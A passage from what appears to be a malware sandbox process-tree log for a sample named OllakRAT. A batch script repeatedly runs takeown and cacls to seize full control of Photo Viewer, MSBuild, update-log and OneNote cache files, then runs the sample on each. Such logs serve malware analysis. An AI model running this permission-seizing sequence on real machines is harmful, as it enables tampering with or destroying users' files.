  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:4544
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5796
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""
  2⤵
  PID:2912
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C
    3⤵
    PID:2380
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"
    3⤵
    - Modifies file permissions
    PID:1280
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "Workflow.Targets" -nobanner
    3⤵
    PID:6036
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "Workflow.Targets" -nobanner
      4⤵
      PID:1832
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5824
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files (x86)\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui""
  2⤵
  PID:3216
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:5460
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    PID:2444
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:3068
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:5220
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1616
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui""
  2⤵
  PID:5036
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:3288
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui"
    3⤵
    PID:5940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:1172
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:3308
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5808
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui""
  2⤵
  PID:5672
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4968
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui"
    3⤵
    PID:5164
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:6112
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:5884
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5512
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.15e08ab7-d0c8-4651-b0ee-2a124fe22b46.1.etl""
  2⤵
  PID:5156
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.15e08ab7-d0c8-4651-b0ee-2a124fe22b46.1.etl" /E /G Admin:F /C
    3⤵
    PID:1344
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.15e08ab7-d0c8-4651-b0ee-2a124fe22b46.1.etl"
    3⤵
    - Modifies file permissions
    PID:4952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "UpdateSessionOrchestration.15e08ab7-d0c8-4651-b0ee-2a124fe22b46.1.etl" -nobanner
    3⤵
    PID:5956
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "UpdateSessionOrchestration.15e08ab7-d0c8-4651-b0ee-2a124fe22b46.1.etl" -nobanner
      4⤵
      PID:5872
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1160
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui""
  2⤵
  PID:6008
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5852
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:5828
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui"
    3⤵
    PID:4728
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:5592
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:4884
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5052
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe""
  2⤵
  PID:5876
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C
    3⤵
    PID:4764
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
    3⤵
    - Modifies file permissions
    PID:6020
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "ImagingDevices.exe" -nobanner
    3⤵
    PID:4224
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "ImagingDevices.exe" -nobanner
      4⤵
      PID:5840
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5444
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.c29a9f45-dacd-419c-a394-413e04571c94.1.etl""
  2⤵
  PID:4340
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.c29a9f45-dacd-419c-a394-413e04571c94.1.etl" /E /G Admin:F /C
    3⤵
    PID:2924
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.c29a9f45-dacd-419c-a394-413e04571c94.1.etl"
    3⤵
    PID:5532
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "NotificationUxBroker.c29a9f45-dacd-419c-a394-413e04571c94.1.etl" -nobanner
    3⤵
    PID:6000
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "NotificationUxBroker.c29a9f45-dacd-419c-a394-413e04571c94.1.etl" -nobanner
      4⤵
      PID:5420
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:300
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui""
  2⤵
  PID:296
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:288
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:5704
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    PID:2180
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:2072
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:4892
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5760
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui""
  2⤵
  PID:4076
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3780
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2380
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui"
    3⤵
    PID:1280
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:1368
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:3716
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5976
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000F.bin""
  2⤵
  PID:1624
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000F.bin" /E /G Admin:F /C
    3⤵
    PID:5524
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000F.bin"
    3⤵
    PID:3868
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "0000000F.bin" -nobanner
    3⤵
    PID:3784
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "0000000F.bin" -nobanner
      4⤵
      PID:3752
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3096
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000Q.bin""
  2⤵
  PID:5160
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000Q.bin" /E /G Admin:F /C
    3⤵
    PID:5092
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000Q.bin"
    3⤵
    PID:5940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "0000000Q.bin" -nobanner
    3⤵
    PID:5504
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "0000000Q.bin" -nobanner
      4⤵
      PID:5508
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4220
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000014.bin""
  2⤵
  PID:5036
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000014.bin" /E /G Admin:F /C
    3⤵
    PID:5280
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000014.bin"
    3⤵
    PID:4712
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "00000014.bin" -nobanner
    3⤵
    PID:908
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "00000014.bin" -nobanner
      4⤵
      PID:5948
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2296
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000058.bin""
  2⤵
  PID:4052
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000058.bin" /E /G Admin:F /C
    3⤵
    PID:1344
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000058.bin"
    3⤵
    - Modifies file permissions
    PID:4952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "00000058.bin" -nobanner
    3⤵
    PID:4328
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "00000058.bin" -nobanner
      4⤵
      PID:5956
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5708
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007E.bin""
  2⤵
  PID:5156
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007E.bin" /E /G Admin:F /C
    3⤵
    PID:872
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007E.bin"
    3⤵
    PID:3668
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "0000007E.bin" -nobanner
    3⤵
    PID:5088
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "0000007E.bin" -nobanner
      4⤵
      PID:4884
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3240
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007O.bin""
  2⤵
  PID:4584
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007O.bin" /E /G Admin:F /C
    3⤵
    PID:2436
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007O.bin"
    3⤵
    PID:1964
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "0000007O.bin" -nobanner
    3⤵
    PID:5768
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "0000007O.bin" -nobanner
      4⤵
      PID:4224
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:956
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008D.bin""
  2⤵
  PID:5152
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008D.bin" /E /G Admin:F /C
    3⤵
    PID:3980
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008D.bin"
    3⤵
    - Modifies file permissions
    PID:536
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "0000008D.bin" -nobanner
    3⤵
    PID:5016
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "0000008D.bin" -nobanner
      4⤵
      PID:5364
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6076
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008N.bin""
  2⤵
  PID:752
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008N.bin" /E /G Admin:F /C
    3⤵
    PID:4592
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008N.bin"
    3⤵
    PID:5608
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "0000008N.bin" -nobanner
    3⤵
    PID:5704
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "0000008N.bin" -nobanner
      4⤵
      PID:2180
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4892
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000093.bin""
  2⤵
  PID:952
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000093.bin" /E /G Admin:F /C
    3⤵
    PID:2184
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000093.bin"
    3⤵
    - Modifies file permissions
    PID:2380
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "00000093.bin" -nobanner
    3⤵
    PID:4300
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "00000093.bin" -nobanner
      4⤵
      PID:6036
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5644
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A9.bin""
  2⤵
  PID:5976
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A9.bin" /E /G Admin:F /C
    3⤵
    PID:3936
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A9.bin"
    3⤵
    PID:5844
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "000000A9.bin" -nobanner
    3⤵
    PID:2540
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "000000A9.bin" -nobanner
      4⤵
      PID:1324
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3432
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.99921e7a-5386-405b-b429-8f69c560570f.1.etl""
  2⤵
  PID:4220
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.99921e7a-5386-405b-b429-8f69c560570f.1.etl" /E /G Admin:F /C
    3⤵
    PID:5916
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.99921e7a-5386-405b-b429-8f69c560570f.1.etl"
    3⤵
    PID:5280
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "UpdateSessionOrchestration.99921e7a-5386-405b-b429-8f69c560570f.1.etl" -nobanner
    3⤵
    PID:4712
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "UpdateSessionOrchestration.99921e7a-5386-405b-b429-8f69c560570f.1.etl" -nobanner
      4⤵
      PID:6112
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5408
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000G.bin""
  2⤵
  PID:5512
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000G.bin" /E /G Admin:F /C
    3⤵
    PID:5256
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000G.bin"
    3⤵
    - Modifies file permissions
    PID:5932
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "0000000G.bin" -nobanner
    3⤵
    PID:5968
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "0000000G.bin" -nobanner
      4⤵
      PID:2716
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5956
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.b317fc97-4d9f-4be6-a7f5-4915ca447c5a.2.etl""
  2⤵
  PID:1160
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.b317fc97-4d9f-4be6-a7f5-4915ca447c5a.2.etl" /E /G Admin:F /C
    3⤵
    PID:4928
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.b317fc97-4d9f-4be6-a7f5-4915ca447c5a.2.etl"
    3⤵
    PID:5652
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "MoUsoCoreWorker.b317fc97-4d9f-4be6-a7f5-4915ca447c5a.2.etl" -nobanner
    3⤵
    PID:5828
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "MoUsoCoreWorker.b317fc97-4d9f-4be6-a7f5-4915ca447c5a.2.etl" -nobanner
      4⤵
      PID:3668
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3896
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000R.bin""
  2⤵
  PID:5052
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000R.bin" /E /G Admin:F /C
    3⤵
    PID:2280
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000R.bin"
    3⤵
    PID:1688
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "0000000R.bin" -nobanner
    3⤵
    PID:5500
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "0000000R.bin" -nobanner
      4⤵
      PID:5936
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6064
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iS1jiihw.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000015.bin""
  2⤵
  PID:5768
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000015.bin" /E /G Admin:F /C
    3⤵
    PID:3604
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000015.bin"
    3⤵
    PID:4272
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c OllakRAT.exe -accepteula "00000015.bin" -nobanner
    3⤵
    PID:4012
  - - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
      OllakRAT.exe -accepteula "00000015.bin" -nobanner
      4⤵
      PID:2924
- - C:\Users\Admin\AppData\Local\Temp\OllakRAT.exe
    OllakRAT.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4572
- C:\Windows\SysWOW64\cmd.exe
